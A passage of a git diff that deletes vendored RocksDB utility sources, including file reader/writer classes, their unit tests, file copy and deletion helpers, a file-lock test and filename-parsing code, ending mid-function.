-  bool for_compaction_;
-
- public:
-  explicit RandomAccessFileReader(std::unique_ptr<RandomAccessFile>&& raf,
-                                  std::string _file_name,
-                                  Env* env = nullptr,
-                                  Statistics* stats = nullptr,
-                                  uint32_t hist_type = 0,
-                                  HistogramImpl* file_read_hist = nullptr,
-                                  RateLimiter* rate_limiter = nullptr,
-                                  bool for_compaction = false)
-      : file_(std::move(raf)),
-        file_name_(std::move(_file_name)),
-        env_(env),
-        stats_(stats),
-        hist_type_(hist_type),
-        file_read_hist_(file_read_hist),
-        rate_limiter_(rate_limiter),
-        for_compaction_(for_compaction) {}
-
-  RandomAccessFileReader(RandomAccessFileReader&& o) ROCKSDB_NOEXCEPT {
-    *this = std::move(o);
-  }
-
-  RandomAccessFileReader& operator=(RandomAccessFileReader&& o)
-      ROCKSDB_NOEXCEPT {
-    file_ = std::move(o.file_);
-    env_ = std::move(o.env_);
-    stats_ = std::move(o.stats_);
-    hist_type_ = std::move(o.hist_type_);
-    file_read_hist_ = std::move(o.file_read_hist_);
-    rate_limiter_ = std::move(o.rate_limiter_);
-    for_compaction_ = std::move(o.for_compaction_);
-    return *this;
-  }
-
-  RandomAccessFileReader(const RandomAccessFileReader&) = delete;
-  RandomAccessFileReader& operator=(const RandomAccessFileReader&) = delete;
-
-  Status Read(uint64_t offset, size_t n, Slice* result, char* scratch) const;
-
-  Status Prefetch(uint64_t offset, size_t n) const {
-    return file_->Prefetch(offset, n);
-  }
-
-  RandomAccessFile* file() { return file_.get(); }
-
-  std::string file_name() const { return file_name_; }
-
-  bool use_direct_io() const { return file_->use_direct_io(); }
-};
-
-// Use posix write to write data to a file.
-class WritableFileWriter {
- private:
-  std::unique_ptr<WritableFile> writable_file_;
-  AlignedBuffer           buf_;
-  size_t                  max_buffer_size_;
-  // Actually written data size can be used for truncate
-  // not counting padding data
-  uint64_t                filesize_;
-#ifndef ROCKSDB_LITE
-  // This is necessary when we use unbuffered access
-  // and writes must happen on aligned offsets
-  // so we need to go back and write that page again
-  uint64_t                next_write_offset_;
-#endif  // ROCKSDB_LITE
-  bool                    pending_sync_;
-  uint64_t                last_sync_size_;
-  uint64_t                bytes_per_sync_;
-  RateLimiter*            rate_limiter_;
-  Statistics* stats_;
-
- public:
-  WritableFileWriter(std::unique_ptr<WritableFile>&& file,
-                     const EnvOptions& options, Statistics* stats = nullptr)
-      : writable_file_(std::move(file)),
-        buf_(),
-        max_buffer_size_(options.writable_file_max_buffer_size),
-        filesize_(0),
-#ifndef ROCKSDB_LITE
-        next_write_offset_(0),
-#endif  // ROCKSDB_LITE
-        pending_sync_(false),
-        last_sync_size_(0),
-        bytes_per_sync_(options.bytes_per_sync),
-        rate_limiter_(options.rate_limiter),
-        stats_(stats) {
-    buf_.Alignment(writable_file_->GetRequiredBufferAlignment());
-    buf_.AllocateNewBuffer(std::min((size_t)65536, max_buffer_size_));
-  }
-
-  WritableFileWriter(const WritableFileWriter&) = delete;
-
-  WritableFileWriter& operator=(const WritableFileWriter&) = delete;
-
-  ~WritableFileWriter() { Close(); }
-
-  Status Append(const Slice& data);
-
-  Status Flush();
-
-  Status Close();
-
-  Status Sync(bool use_fsync);
-
-  // Sync only the data that was already Flush()ed. Safe to call concurrently
-  // with Append() and Flush(). If !writable_file_->IsSyncThreadSafe(),
-  // returns NotSupported status.
-  Status SyncWithoutFlush(bool use_fsync);
-
-  uint64_t GetFileSize() { return filesize_; }
-
-  Status InvalidateCache(size_t offset, size_t length) {
-    return writable_file_->InvalidateCache(offset, length);
-  }
-
-  WritableFile* writable_file() const { return writable_file_.get(); }
-
-  bool use_direct_io() { return writable_file_->use_direct_io(); }
-
- private:
-  // Used when os buffering is OFF and we are writing
-  // DMA such as in Direct I/O mode
-#ifndef ROCKSDB_LITE
-  Status WriteDirect();
-#endif  // !ROCKSDB_LITE
-  // Normal write
-  Status WriteBuffered(const char* data, size_t size);
-  Status RangeSync(uint64_t offset, uint64_t nbytes);
-  Status SyncInternal(bool use_fsync);
-};
-
-class FilePrefetchBuffer {
- public:
-  Status Prefetch(RandomAccessFileReader* reader, uint64_t offset, size_t n);
-  bool TryReadFromCache(uint64_t offset, size_t n, Slice* result) const;
-
- private:
-  AlignedBuffer buffer_;
-  uint64_t buffer_offset_;
-  size_t buffer_len_;
-};
-
-extern Status NewWritableFile(Env* env, const std::string& fname,
-                              unique_ptr<WritableFile>* result,
-                              const EnvOptions& options);
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/file_reader_writer_test.cc b/thirdparty/rocksdb/util/file_reader_writer_test.cc
deleted file mode 100644
index 45675e9..0000000
--- a/thirdparty/rocksdb/util/file_reader_writer_test.cc
+++ /dev/null
@@ -1,325 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include "util/file_reader_writer.h"
-#include <algorithm>
-#include <vector>
-#include "util/random.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class WritableFileWriterTest : public testing::Test {};
-
-const uint32_t kMb = 1 << 20;
-
-TEST_F(WritableFileWriterTest, RangeSync) {
-  class FakeWF : public WritableFile {
-   public:
-    explicit FakeWF() : size_(0), last_synced_(0) {}
-    ~FakeWF() {}
-
-    Status Append(const Slice& data) override {
-      size_ += data.size();
-      return Status::OK();
-    }
-    virtual Status Truncate(uint64_t size) override {
-      return Status::OK();
-    }
-    Status Close() override {
-      EXPECT_GE(size_, last_synced_ + kMb);
-      EXPECT_LT(size_, last_synced_ + 2 * kMb);
-      // Make sure random writes generated enough writes.
-      EXPECT_GT(size_, 10 * kMb);
-      return Status::OK();
-    }
-    Status Flush() override { return Status::OK(); }
-    Status Sync() override { return Status::OK(); }
-    Status Fsync() override { return Status::OK(); }
-    void SetIOPriority(Env::IOPriority pri) override {}
-    uint64_t GetFileSize() override { return size_; }
-    void GetPreallocationStatus(size_t* block_size,
-                                size_t* last_allocated_block) override {}
-    size_t GetUniqueId(char* id, size_t max_size) const override { return 0; }
-    Status InvalidateCache(size_t offset, size_t length) override {
-      return Status::OK();
-    }
-
-   protected:
-    Status Allocate(uint64_t offset, uint64_t len) override { return Status::OK(); }
-    Status RangeSync(uint64_t offset, uint64_t nbytes) override {
-      EXPECT_EQ(offset % 4096, 0u);
-      EXPECT_EQ(nbytes % 4096, 0u);
-
-      EXPECT_EQ(offset, last_synced_);
-      last_synced_ = offset + nbytes;
-      EXPECT_GE(size_, last_synced_ + kMb);
-      if (size_ > 2 * kMb) {
-        EXPECT_LT(size_, last_synced_ + 2 * kMb);
-      }
-      return Status::OK();
-    }
-
-    uint64_t size_;
-    uint64_t last_synced_;
-  };
-
-  EnvOptions env_options;
-  env_options.bytes_per_sync = kMb;
-  unique_ptr<FakeWF> wf(new FakeWF);
-  unique_ptr<WritableFileWriter> writer(
-      new WritableFileWriter(std::move(wf), env_options));
-  Random r(301);
-  std::unique_ptr<char[]> large_buf(new char[10 * kMb]);
-  for (int i = 0; i < 1000; i++) {
-    int skew_limit = (i < 700) ? 10 : 15;
-    uint32_t num = r.Skewed(skew_limit) * 100 + r.Uniform(100);
-    writer->Append(Slice(large_buf.get(), num));
-
-    // Flush in a chance of 1/10.
-    if (r.Uniform(10) == 0) {
-      writer->Flush();
-    }
-  }
-  writer->Close();
-}
-
-TEST_F(WritableFileWriterTest, IncrementalBuffer) {
-  class FakeWF : public WritableFile {
-   public:
-    explicit FakeWF(std::string* _file_data, bool _use_direct_io,
-                    bool _no_flush)
-        : file_data_(_file_data),
-          use_direct_io_(_use_direct_io),
-          no_flush_(_no_flush) {}
-    ~FakeWF() {}
-
-    Status Append(const Slice& data) override {
-      file_data_->append(data.data(), data.size());
-      size_ += data.size();
-      return Status::OK();
-    }
-    Status PositionedAppend(const Slice& data, uint64_t pos) override {
-      EXPECT_TRUE(pos % 512 == 0);
-      EXPECT_TRUE(data.size() % 512 == 0);
-      file_data_->resize(pos);
-      file_data_->append(data.data(), data.size());
-      size_ += data.size();
-      return Status::OK();
-    }
-
-    virtual Status Truncate(uint64_t size) override {
-      file_data_->resize(size);
-      return Status::OK();
-    }
-    Status Close() override { return Status::OK(); }
-    Status Flush() override { return Status::OK(); }
-    Status Sync() override { return Status::OK(); }
-    Status Fsync() override { return Status::OK(); }
-    void SetIOPriority(Env::IOPriority pri) override {}
-    uint64_t GetFileSize() override { return size_; }
-    void GetPreallocationStatus(size_t* block_size,
-                                size_t* last_allocated_block) override {}
-    size_t GetUniqueId(char* id, size_t max_size) const override { return 0; }
-    Status InvalidateCache(size_t offset, size_t length) override {
-      return Status::OK();
-    }
-    bool use_direct_io() const override { return use_direct_io_; }
-
-    std::string* file_data_;
-    bool use_direct_io_;
-    bool no_flush_;
-    size_t size_ = 0;
-  };
-
-  Random r(301);
-  const int kNumAttempts = 50;
-  for (int attempt = 0; attempt < kNumAttempts; attempt++) {
-    bool no_flush = (attempt % 3 == 0);
-    EnvOptions env_options;
-    env_options.writable_file_max_buffer_size =
-        (attempt < kNumAttempts / 2) ? 512 * 1024 : 700 * 1024;
-    std::string actual;
-    unique_ptr<FakeWF> wf(new FakeWF(&actual,
-#ifndef ROCKSDB_LITE
-                                     attempt % 2 == 1,
-#else
-                                     false,
-#endif
-                                     no_flush));
-    unique_ptr<WritableFileWriter> writer(
-        new WritableFileWriter(std::move(wf), env_options));
-
-    std::string target;
-    for (int i = 0; i < 20; i++) {
-      uint32_t num = r.Skewed(16) * 100 + r.Uniform(100);
-      std::string random_string;
-      test::RandomString(&r, num, &random_string);
-      writer->Append(Slice(random_string.c_str(), num));
-      target.append(random_string.c_str(), num);
-
-      // In some attempts, flush in a chance of 1/10.
-      if (!no_flush && r.Uniform(10) == 0) {
-        writer->Flush();
-      }
-    }
-    writer->Flush();
-    writer->Close();
-    ASSERT_EQ(target.size(), actual.size());
-    ASSERT_EQ(target, actual);
-  }
-}
-
-#ifndef ROCKSDB_LITE
-TEST_F(WritableFileWriterTest, AppendStatusReturn) {
-  class FakeWF : public WritableFile {
-   public:
-    explicit FakeWF() : use_direct_io_(false), io_error_(false) {}
-
-    virtual bool use_direct_io() const override { return use_direct_io_; }
-    Status Append(const Slice& data) override {
-      if (io_error_) {
-        return Status::IOError("Fake IO error");
-      }
-      return Status::OK();
-    }
-    Status PositionedAppend(const Slice& data, uint64_t) override {
-      if (io_error_) {
-        return Status::IOError("Fake IO error");
-      }
-      return Status::OK();
-    }
-    Status Close() override { return Status::OK(); }
-    Status Flush() override { return Status::OK(); }
-    Status Sync() override { return Status::OK(); }
-    void Setuse_direct_io(bool val) { use_direct_io_ = val; }
-    void SetIOError(bool val) { io_error_ = val; }
-
-   protected:
-    bool use_direct_io_;
-    bool io_error_;
-  };
-  unique_ptr<FakeWF> wf(new FakeWF());
-  wf->Setuse_direct_io(true);
-  unique_ptr<WritableFileWriter> writer(
-      new WritableFileWriter(std::move(wf), EnvOptions()));
-
-  ASSERT_OK(writer->Append(std::string(2 * kMb, 'a')));
-
-  // Next call to WritableFile::Append() should fail
-  dynamic_cast<FakeWF*>(writer->writable_file())->SetIOError(true);
-  ASSERT_NOK(writer->Append(std::string(2 * kMb, 'b')));
-}
-#endif
-
-class ReadaheadRandomAccessFileTest
-    : public testing::Test,
-      public testing::WithParamInterface<size_t> {
- public:
-  static std::vector<size_t> GetReadaheadSizeList() {
-    return {1lu << 12, 1lu << 16};
-  }
-  virtual void SetUp() override {
-    readahead_size_ = GetParam();
-    scratch_.reset(new char[2 * readahead_size_]);
-    ResetSourceStr();
-  }
-  ReadaheadRandomAccessFileTest() : control_contents_() {}
-  std::string Read(uint64_t offset, size_t n) {
-    Slice result;
-    test_read_holder_->Read(offset, n, &result, scratch_.get());
-    return std::string(result.data(), result.size());
-  }
-  void ResetSourceStr(const std::string& str = "") {
-    auto write_holder = std::unique_ptr<WritableFileWriter>(
-        test::GetWritableFileWriter(new test::StringSink(&control_contents_)));
-    write_holder->Append(Slice(str));
-    write_holder->Flush();
-    auto read_holder = std::unique_ptr<RandomAccessFile>(
-        new test::StringSource(control_contents_));
-    test_read_holder_ =
-        NewReadaheadRandomAccessFile(std::move(read_holder), readahead_size_);
-  }
-  size_t GetReadaheadSize() const { return readahead_size_; }
-
- private:
-  size_t readahead_size_;
-  Slice control_contents_;
-  std::unique_ptr<RandomAccessFile> test_read_holder_;
-  std::unique_ptr<char[]> scratch_;
-};
-
-TEST_P(ReadaheadRandomAccessFileTest, EmptySourceStrTest) {
-  ASSERT_EQ("", Read(0, 1));
-  ASSERT_EQ("", Read(0, 0));
-  ASSERT_EQ("", Read(13, 13));
-}
-
-TEST_P(ReadaheadRandomAccessFileTest, SourceStrLenLessThanReadaheadSizeTest) {
-  std::string str = "abcdefghijklmnopqrs";
-  ResetSourceStr(str);
-  ASSERT_EQ(str.substr(3, 4), Read(3, 4));
-  ASSERT_EQ(str.substr(0, 3), Read(0, 3));
-  ASSERT_EQ(str, Read(0, str.size()));
-  ASSERT_EQ(str.substr(7, std::min(static_cast<int>(str.size()) - 7, 30)),
-            Read(7, 30));
-  ASSERT_EQ("", Read(100, 100));
-}
-
-TEST_P(ReadaheadRandomAccessFileTest,
-       SourceStrLenCanBeGreaterThanReadaheadSizeTest) {
-  Random rng(42);
-  for (int k = 0; k < 100; ++k) {
-    size_t strLen = k * GetReadaheadSize() +
-                    rng.Uniform(static_cast<int>(GetReadaheadSize()));
-    std::string str =
-        test::RandomHumanReadableString(&rng, static_cast<int>(strLen));
-    ResetSourceStr(str);
-    for (int test = 1; test <= 100; ++test) {
-      size_t offset = rng.Uniform(static_cast<int>(strLen));
-      size_t n = rng.Uniform(static_cast<int>(GetReadaheadSize()));
-      ASSERT_EQ(str.substr(offset, std::min(n, str.size() - offset)),
-                Read(offset, n));
-    }
-  }
-}
-
-TEST_P(ReadaheadRandomAccessFileTest, NExceedReadaheadTest) {
-  Random rng(7);
-  size_t strLen = 4 * GetReadaheadSize() +
-                  rng.Uniform(static_cast<int>(GetReadaheadSize()));
-  std::string str =
-      test::RandomHumanReadableString(&rng, static_cast<int>(strLen));
-  ResetSourceStr(str);
-  for (int test = 1; test <= 100; ++test) {
-    size_t offset = rng.Uniform(static_cast<int>(strLen));
-    size_t n =
-        GetReadaheadSize() + rng.Uniform(static_cast<int>(GetReadaheadSize()));
-    ASSERT_EQ(str.substr(offset, std::min(n, str.size() - offset)),
-              Read(offset, n));
-  }
-}
-
-INSTANTIATE_TEST_CASE_P(
-    EmptySourceStrTest, ReadaheadRandomAccessFileTest,
-    ::testing::ValuesIn(ReadaheadRandomAccessFileTest::GetReadaheadSizeList()));
-INSTANTIATE_TEST_CASE_P(
-    SourceStrLenLessThanReadaheadSizeTest, ReadaheadRandomAccessFileTest,
-    ::testing::ValuesIn(ReadaheadRandomAccessFileTest::GetReadaheadSizeList()));
-INSTANTIATE_TEST_CASE_P(
-    SourceStrLenCanBeGreaterThanReadaheadSizeTest,
-    ReadaheadRandomAccessFileTest,
-    ::testing::ValuesIn(ReadaheadRandomAccessFileTest::GetReadaheadSizeList()));
-INSTANTIATE_TEST_CASE_P(
-    NExceedReadaheadTest, ReadaheadRandomAccessFileTest,
-    ::testing::ValuesIn(ReadaheadRandomAccessFileTest::GetReadaheadSizeList()));
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/file_util.cc b/thirdparty/rocksdb/util/file_util.cc
deleted file mode 100644
index c6323b3..0000000
--- a/thirdparty/rocksdb/util/file_util.cc
+++ /dev/null
@@ -1,102 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include "util/file_util.h"
-
-#include <string>
-#include <algorithm>
-
-#include "rocksdb/env.h"
-#include "util/sst_file_manager_impl.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-
-// Utility function to copy a file up to a specified length
-Status CopyFile(Env* env, const std::string& source,
-                const std::string& destination, uint64_t size, bool use_fsync) {
-  const EnvOptions soptions;
-  Status s;
-  unique_ptr<SequentialFileReader> src_reader;
-  unique_ptr<WritableFileWriter> dest_writer;
-
-  {
-    unique_ptr<SequentialFile> srcfile;
-  s = env->NewSequentialFile(source, &srcfile, soptions);
-  unique_ptr<WritableFile> destfile;
-  if (s.ok()) {
-    s = env->NewWritableFile(destination, &destfile, soptions);
-  } else {
-    return s;
-  }
-
-  if (size == 0) {
-    // default argument means copy everything
-    if (s.ok()) {
-      s = env->GetFileSize(source, &size);
-    } else {
-      return s;
-    }
-  }
-  src_reader.reset(new SequentialFileReader(std::move(srcfile)));
-  dest_writer.reset(new WritableFileWriter(std::move(destfile), soptions));
-  }
-
-  char buffer[4096];
-  Slice slice;
-  while (size > 0) {
-    size_t bytes_to_read = std::min(sizeof(buffer), static_cast<size_t>(size));
-    if (s.ok()) {
-      s = src_reader->Read(bytes_to_read, &slice, buffer);
-    }
-    if (s.ok()) {
-      if (slice.size() == 0) {
-        return Status::Corruption("file too small");
-      }
-      s = dest_writer->Append(slice);
-    }
-    if (!s.ok()) {
-      return s;
-    }
-    size -= slice.size();
-  }
-  dest_writer->Sync(use_fsync);
-  return Status::OK();
-}
-
-// Utility function to create a file with the provided contents
-Status CreateFile(Env* env, const std::string& destination,
-                  const std::string& contents) {
-  const EnvOptions soptions;
-  Status s;
-  unique_ptr<WritableFileWriter> dest_writer;
-
-  unique_ptr<WritableFile> destfile;
-  s = env->NewWritableFile(destination, &destfile, soptions);
-  if (!s.ok()) {
-    return s;
-  }
-  dest_writer.reset(new WritableFileWriter(std::move(destfile), soptions));
-  return dest_writer->Append(Slice(contents));
-}
-
-Status DeleteSSTFile(const ImmutableDBOptions* db_options,
-                     const std::string& fname, uint32_t path_id) {
-  // TODO(tec): support sst_file_manager for multiple path_ids
-#ifndef ROCKSDB_LITE
-  auto sfm =
-      static_cast<SstFileManagerImpl*>(db_options->sst_file_manager.get());
-  if (sfm && path_id == 0) {
-    return sfm->ScheduleFileDeletion(fname);
-  } else {
-    return db_options->env->DeleteFile(fname);
-  }
-#else
-  // SstFileManager is not supported in ROCKSDB_LITE
-  return db_options->env->DeleteFile(fname);
-#endif
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/file_util.h b/thirdparty/rocksdb/util/file_util.h
deleted file mode 100644
index e59377a..0000000
--- a/thirdparty/rocksdb/util/file_util.h
+++ /dev/null
@@ -1,27 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#pragma once
-#include <string>
-
-#include "options/db_options.h"
-#include "rocksdb/env.h"
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-
-namespace rocksdb {
-// use_fsync maps to options.use_fsync, which determines the way that
-// the file is synced after copying.
-extern Status CopyFile(Env* env, const std::string& source,
-                       const std::string& destination, uint64_t size,
-                       bool use_fsync);
-
-extern Status CreateFile(Env* env, const std::string& destination,
-                         const std::string& contents);
-
-extern Status DeleteSSTFile(const ImmutableDBOptions* db_options,
-                            const std::string& fname, uint32_t path_id);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/util/filelock_test.cc b/thirdparty/rocksdb/util/filelock_test.cc
deleted file mode 100644
index cb4bd43..0000000
--- a/thirdparty/rocksdb/util/filelock_test.cc
+++ /dev/null
@@ -1,59 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include "rocksdb/status.h"
-#include "rocksdb/env.h"
-
-#include <vector>
-#include "util/coding.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class LockTest : public testing::Test {
- public:
-  static LockTest* current_;
-  std::string file_;
-  rocksdb::Env* env_;
-
-  LockTest() : file_(test::TmpDir() + "/db_testlock_file"),
-               env_(rocksdb::Env::Default()) {
-    current_ = this;
-  }
-
-  ~LockTest() {
-  }
-
-  Status LockFile(FileLock** db_lock) {
-    return env_->LockFile(file_, db_lock);
-  }
-
-  Status UnlockFile(FileLock* db_lock) {
-    return env_->UnlockFile(db_lock);
-  }
-};
-LockTest* LockTest::current_;
-
-TEST_F(LockTest, LockBySameThread) {
-  FileLock* lock1;
-  FileLock* lock2;
-
-  // acquire a lock on a file
-  ASSERT_OK(LockFile(&lock1));
-
-  // re-acquire the lock on the same file. This should fail.
-  ASSERT_TRUE(LockFile(&lock2).IsIOError());
-
-  // release the lock
-  ASSERT_OK(UnlockFile(lock1));
-
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/util/filename.cc b/thirdparty/rocksdb/util/filename.cc
deleted file mode 100644
index fa1618e..0000000
--- a/thirdparty/rocksdb/util/filename.cc
+++ /dev/null
@@ -1,403 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "util/filename.h"
-#include <inttypes.h>
-
-#include <ctype.h>
-#include <stdio.h>
-#include <vector>
-#include "rocksdb/env.h"
-#include "util/file_reader_writer.h"
-#include "util/logging.h"
-#include "util/stop_watch.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-static const std::string kRocksDbTFileExt = "sst";
-static const std::string kLevelDbTFileExt = "ldb";
-static const std::string kRocksDBBlobFileExt = "blob";
-
-// Given a path, flatten the path name by replacing all chars not in
-// {[0-9,a-z,A-Z,-,_,.]} with _. And append '_LOG\0' at the end.
-// Return the number of chars stored in dest not including the trailing '\0'.
-static size_t GetInfoLogPrefix(const std::string& path, char* dest, int len) {
-  const char suffix[] = "_LOG";
-
-  size_t write_idx = 0;
-  size_t i = 0;
-  size_t src_len = path.size();
-
-  while (i < src_len && write_idx < len - sizeof(suffix)) {
-    if ((path[i] >= 'a' && path[i] <= 'z') ||
-        (path[i] >= '0' && path[i] <= '9') ||
-        (path[i] >= 'A' && path[i] <= 'Z') ||
-        path[i] == '-' ||
-        path[i] == '.' ||
-        path[i] == '_'){
-      dest[write_idx++] = path[i];
-    } else {
-      if (i > 0) {
-        dest[write_idx++] = '_';
-      }
-    }
-    i++;
-  }
-  assert(sizeof(suffix) <= len - write_idx);
-  // "\0" is automatically added by snprintf
-  snprintf(dest + write_idx, len - write_idx, suffix);
-  write_idx += sizeof(suffix) - 1;
-  return write_idx;
-}
-
-static std::string MakeFileName(const std::string& name, uint64_t number,
-                                const char* suffix) {
-  char buf[100];
-  snprintf(buf, sizeof(buf), "/%06llu.%s",
-           static_cast<unsigned long long>(number),
-           suffix);
-  return name + buf;
-}
-
-std::string LogFileName(const std::string& name, uint64_t number) {
-  assert(number > 0);
-  return MakeFileName(name, number, "log");
-}
-
-std::string BlobFileName(const std::string& blobdirname, uint64_t number) {
-  assert(number > 0);
-  return MakeFileName(blobdirname, number, kRocksDBBlobFileExt.c_str());
-}
-
-std::string ArchivalDirectory(const std::string& dir) {
-  return dir + "/" + ARCHIVAL_DIR;
-}
-std::string ArchivedLogFileName(const std::string& name, uint64_t number) {
-  assert(number > 0);
-  return MakeFileName(name + "/" + ARCHIVAL_DIR, number, "log");
-}
-
-std::string MakeTableFileName(const std::string& path, uint64_t number) {
-  return MakeFileName(path, number, kRocksDbTFileExt.c_str());
-}
-
-std::string Rocks2LevelTableFileName(const std::string& fullname) {
-  assert(fullname.size() > kRocksDbTFileExt.size() + 1);
-  if (fullname.size() <= kRocksDbTFileExt.size() + 1) {
-    return "";
-  }
-  return fullname.substr(0, fullname.size() - kRocksDbTFileExt.size()) +
-         kLevelDbTFileExt;
-}
-
-uint64_t TableFileNameToNumber(const std::string& name) {
-  uint64_t number = 0;
-  uint64_t base = 1;
-  int pos = static_cast<int>(name.find_last_of('.'));
-  while (--pos >= 0 && name[pos] >= '0' && name[pos] <= '9') {
-    number += (name[pos] - '0') * base;
-    base *= 10;
-  }
-  return number;
-}
-
-std::string TableFileName(const std::vector<DbPath>& db_paths, uint64_t number,
-                          uint32_t path_id) {
-  assert(number > 0);
-  std::string path;
-  if (path_id >= db_paths.size()) {
-    path = db_paths.back().path;
-  } else {
-    path = db_paths[path_id].path;
-  }
-  return MakeTableFileName(path, number);
-}
-
-void FormatFileNumber(uint64_t number, uint32_t path_id, char* out_buf,
-                      size_t out_buf_size) {
-  if (path_id == 0) {
-    snprintf(out_buf, out_buf_size, "%" PRIu64, number);
-  } else {
-    snprintf(out_buf, out_buf_size, "%" PRIu64
-                                    "(path "
-                                    "%" PRIu32 ")",
-             number, path_id);
-  }
-}
-
-std::string DescriptorFileName(const std::string& dbname, uint64_t number) {
-  assert(number > 0);
-  char buf[100];
-  snprintf(buf, sizeof(buf), "/MANIFEST-%06llu",
-           static_cast<unsigned long long>(number));
-  return dbname + buf;
-}
-
-std::string CurrentFileName(const std::string& dbname) {
-  return dbname + "/CURRENT";
-}
-
-std::string LockFileName(const std::string& dbname) {
-  return dbname + "/LOCK";
-}
-
-std::string TempFileName(const std::string& dbname, uint64_t number) {
-  return MakeFileName(dbname, number, kTempFileNameSuffix.c_str());
-}
-
-InfoLogPrefix::InfoLogPrefix(bool has_log_dir,
-                             const std::string& db_absolute_path) {
-  if (!has_log_dir) {
-    const char kInfoLogPrefix[] = "LOG";
-    // "\0" is automatically added to the end
-    snprintf(buf, sizeof(buf), kInfoLogPrefix);
-    prefix = Slice(buf, sizeof(kInfoLogPrefix) - 1);
-  } else {
-    size_t len = GetInfoLogPrefix(db_absolute_path, buf, sizeof(buf));
-    prefix = Slice(buf, len);
-  }
-}
-
-std::string InfoLogFileName(const std::string& dbname,
-    const std::string& db_path, const std::string& log_dir) {
-  if (log_dir.empty()) {
-    return dbname + "/LOG";
-  }
-
-  InfoLogPrefix info_log_prefix(true, db_path);
-  return log_dir + "/" + info_log_prefix.buf;
-}
-
-// Return the name of the old info log file for "dbname".
-std::string OldInfoLogFileName(const std::string& dbname, uint64_t ts,
-    const std::string& db_path, const std::string& log_dir) {
-  char buf[50];
-  snprintf(buf, sizeof(buf), "%llu", static_cast<unsigned long long>(ts));
-
-  if (log_dir.empty()) {
-    return dbname + "/LOG.old." + buf;
-  }
-
-  InfoLogPrefix info_log_prefix(true, db_path);
-  return log_dir + "/" + info_log_prefix.buf + ".old." + buf;
-}
-
-std::string OptionsFileName(const std::string& dbname, uint64_t file_num) {
-  char buffer[256];
-  snprintf(buffer, sizeof(buffer), "%s%06" PRIu64,
-           kOptionsFileNamePrefix.c_str(), file_num);
-  return dbname + "/" + buffer;
-}
-
-std::string TempOptionsFileName(const std::string& dbname, uint64_t file_num) {
-  char buffer[256];
-  snprintf(buffer, sizeof(buffer), "%s%06" PRIu64 ".%s",
-           kOptionsFileNamePrefix.c_str(), file_num,
-           kTempFileNameSuffix.c_str());
-  return dbname + "/" + buffer;
-}
-
-std::string MetaDatabaseName(const std::string& dbname, uint64_t number) {
-  char buf[100];
-  snprintf(buf, sizeof(buf), "/METADB-%llu",
-           static_cast<unsigned long long>(number));
-  return dbname + buf;
-}
-
-std::string IdentityFileName(const std::string& dbname) {
-  return dbname + "/IDENTITY";
-}
-
-// Owned filenames have the form:
-//    dbname/IDENTITY
-//    dbname/CURRENT
-//    dbname/LOCK
-//    dbname/<info_log_name_prefix>
-//    dbname/<info_log_name_prefix>.old.[0-9]+
-//    dbname/MANIFEST-[0-9]+
-//    dbname/[0-9]+.(log|sst|blob)
-//    dbname/METADB-[0-9]+
-//    dbname/OPTIONS-[0-9]+
-//    dbname/OPTIONS-[0-9]+.dbtmp
-//    Disregards / at the beginning
-bool ParseFileName(const std::string& fname,
-                   uint64_t* number,
-                   FileType* type,
-                   WalFileType* log_type) {
-  return ParseFileName(fname, number, "", type, log_type);
-}
-
-bool ParseFileName(const std::string& fname, uint64_t* number,
-                   const Slice& info_log_name_prefix, FileType* type,
-                   WalFileType* log_type) {
-  Slice rest(fname);
-  if (fname.length() > 1 && fname[0] == '/') {
-    rest.remove_prefix(1);
-  }
-  if (rest == "IDENTITY") {
-    *number = 0;
-    *type = kIdentityFile;
-  } else if (rest == "CURRENT") {
-    *number = 0;
-    *type = kCurrentFile;
-  } else if (rest == "LOCK") {
-    *number = 0;
-    *type = kDBLockFile;
-  } else if (info_log_name_prefix.size() > 0 &&
-             rest.starts_with(info_log_name_prefix)) {
-    rest.remove_prefix(info_log_name_prefix.size());
-    if (rest == "" || rest == ".old") {
-      *number = 0;
-      *type = kInfoLogFile;
-    } else if (rest.starts_with(".old.")) {
-      uint64_t ts_suffix;
-      // sizeof also counts the trailing '\0'.
-      rest.remove_prefix(sizeof(".old.") - 1);
-      if (!ConsumeDecimalNumber(&rest, &ts_suffix)) {
-        return false;
-      }
-      *number = ts_suffix;
-      *type = kInfoLogFile;
-    }
